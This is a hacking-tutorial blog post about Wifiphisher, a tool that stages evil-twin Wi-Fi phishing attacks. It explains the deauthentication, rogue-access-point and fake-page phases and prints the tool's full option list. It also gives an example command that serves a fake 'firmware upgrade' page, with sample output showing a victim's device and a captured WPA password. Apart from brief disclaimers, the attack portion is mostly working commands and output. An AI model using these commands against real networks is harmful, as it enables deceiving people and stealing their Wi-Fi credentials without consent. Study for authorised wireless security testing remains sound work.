--> Wifiphisher | Automated Phishing Attacks Against Wi-Fi Networks | Crackcodes.in

Warning:-

All the information provided on this site are for educational purposes only. The site is no way responsible for any misuse of the information.The word “Hack” or “Hacking” that is used on this site shall be regarded as “Ethical Hack” or “Ethical Hacking” respectively.

Wifiphisher | Automated Phishing Attacks Against Wi-Fi Networks

Wifiphisher is a tool that mounts automated phishing attacks against Wi-Fi networks in order to obtain credentials or infect the victims with malware.

 #Wireless Hacking

Warning:-You shall not misuse the information to gain unauthorised access. However you may try out these hacks on your own computer at your own risk. Performing hack attempts (without permission) on computers that you do not own is illegal.

Wifiphisher | Automated Phishing Attacks Against Wi-Fi Networks

Wifiphisher | Automated Phishing Attacks Against Wi-Fi Networks

Wifiphisher is a security tool that mounts automated phishing attacks against Wi-Fi networks in order to obtain credentials or infect the victims with ‘malware’. It is a social engineering attack that can be used to obtain WPA/WPA2 secret passphrases and unlike other methods, it does not require any brute forcing. After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page

From the victim’s perspective, the attack takes place in three phases:

  1. Victim is deauthenticated from their access point.
  2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point settings.
  3. Victim is served a realistic specially-customized phishing page.

wifiphisher

root@crackcodes:~# wifiphisher -h
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 08:18
usage: wifiphisher [-h] [-s SKIP] [-jI JAMMINGINTERFACE] [-aI APINTERFACE]
                   [-t TIMEINTERVAL] [-p PACKETS] [-d] [-nJ] [-e ESSID]
                   [-T TEMPLATE] [-pK PRESHAREDKEY]

optional arguments:
  -h, --help            show this help message and exit
  -s SKIP, --skip SKIP  Skip deauthing this MAC address. Example: -s
                        00:11:BB:33:44:AA
  -jI JAMMINGINTERFACE, --jamminginterface JAMMINGINTERFACE
                        Choose monitor mode interface. By default script will
                        find the most powerful interface and starts monitor
                        mode on it. Example: -jI mon5
  -aI APINTERFACE, --apinterface APINTERFACE
                        Choose access point interface. By default script will
                        find the most powerful interface and starts an access
                        point on it. Example: -aI wlan0
  -t TIMEINTERVAL, --timeinterval TIMEINTERVAL
                        Choose the time interval between packets being sent.
                        Default is as fast as possible. If you see scapy
                        errors like 'no buffer space' try: -t .00001
  -p PACKETS, --packets PACKETS
                        Choose the number of packets to send in each deauth
                        burst. Default value is 1; 1 packet to the client and
                        1 packet to the AP. Send 2 deauth packets to the
                        client and 2 deauth packets to the AP: -p 2
  -d, --directedonly    Skip the deauthentication packets to the broadcast
                        address ofthe access points and only send them to
                        client/AP pairs
  -nJ, --nojamming      Skip the deauthentication phase.
  -e ESSID, --essid ESSID
                        Enter the ESSID of the rogue access point (Evil Twin)
                        This will skip Access Point selection phase.
  -T TEMPLATE, --template TEMPLATE
                        Choose the template to run.Using this option will skip
                        the interactive selection
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
                        Add WPA/WPA2 protection on the rogue Access Point

#Wifiphisher Usage :-

Do not perform jamming (-nJ), create a wireless access point (-e “Free Wi-Fi”) and present a fake firmware upgrade to clients (-T firmware-upgrade). When a client connects, they a presented with a webpage to enter the PSK of their network:

root@crackcodes:~# wifiphisher -nJ -e "Free Wi-Fi" -T firmware-upgrade
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 13:52
[+] Selecting wlan0 interface for creating the rogue Access Point
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...

Jamming devices:



DHCP Leases:
1487839973 c0:cc:f8:06:53:93 10.0.0.93 Victims-iPhone 11:c0:cc:38:66:a3:b3


HTTP requests:
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] POST 10.0.0.93 wfphshr-wpa-password=s3cr3tp4s5
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93

Example Video :-


COMMENTS

Name

Custom Tools,5,Exploitation Tools,5,Forensics Tools,2,Information Gathering,8,Kali Linux,6,Password Attacks,6,Sniffing & Spoofing,1,Web Tools,6,Wireless Hacking,4,
ltr
item
Crackcodes.in: Wifiphisher | Automated Phishing Attacks Against Wi-Fi Networks
Wifiphisher | Automated Phishing Attacks Against Wi-Fi Networks
Wifiphisher is a tool that mounts automated phishing attacks against Wi-Fi networks in order to obtain credentials or infect the victims with malware.
https://1.bp.blogspot.com/-t147saQuxtM/YIqAJ-04ZUI/AAAAAAAAA5k/UtfOluy72zMA7P8vS0NQNhyAaIkuQ1VMACLcBGAsYHQ/w640-h360/wifiphisher.png
https://1.bp.blogspot.com/-t147saQuxtM/YIqAJ-04ZUI/AAAAAAAAA5k/UtfOluy72zMA7P8vS0NQNhyAaIkuQ1VMACLcBGAsYHQ/s72-w640-c-h360/wifiphisher.png
Crackcodes.in
https://www.crackcodes.in/2021/04/wifiphisher-automated-phishing-attacks.html
https://www.crackcodes.in/
https://www.crackcodes.in/
https://www.crackcodes.in/2021/04/wifiphisher-automated-phishing-attacks.html
true
6015783010633909150
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy Table of Content